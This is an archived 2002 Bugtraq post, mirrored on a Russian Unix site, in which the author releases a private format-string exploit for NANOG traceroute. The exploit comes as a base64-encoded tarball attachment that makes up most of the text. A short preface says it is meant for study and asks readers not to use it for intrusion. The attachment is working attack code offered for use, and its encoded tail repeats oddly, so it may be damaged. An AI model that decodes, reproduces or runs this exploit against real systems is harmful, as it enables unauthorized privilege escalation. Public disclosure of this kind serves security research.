BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Выпущена CD-версия OpenNet.RU для оффлайн просмотра. Для формирования заказа - перейдите по ссылке. SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Sun, 21 Jul 2002 14:09:24 +0200
From: SpaceWalker <spacewalker@minithins.net>
To: bugtraq@securityfocus.com
Subject: Nanog traceroute format string exploit.
Cc: vuln-dev@securityfocus.com

--Multipart_Sun__21_Jul_2002_14:09:24_+0200_0820a3a0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hello,
As the vulnerability has been published some weeks ago, and no working exploit has been released (the perl exploit was joke) I decided to release my private exploit.
I do it only because 
-This exploit will never be used to haxor something because I never saw this traceroute used by default
-This exploit find offsets "by the proper way" and doesn't place the target adresses in the format string. (and is interresting to study for beginners).

Have phun, please don't haxor with it.
SpaceWalker

--Multipart_Sun__21_Jul_2002_14:09:24_+0200_0820a3a0
Content-Type: application/octet-stream;
 name="tracerouteexp.tgz"
Content-Disposition: attachment;
 filename="tracerouteexp.tgz"
Content-Transfer-Encoding: base64

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

--Multipart_Sun__21_Jul_2002_14:09:24_+0200_0820a3a0--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД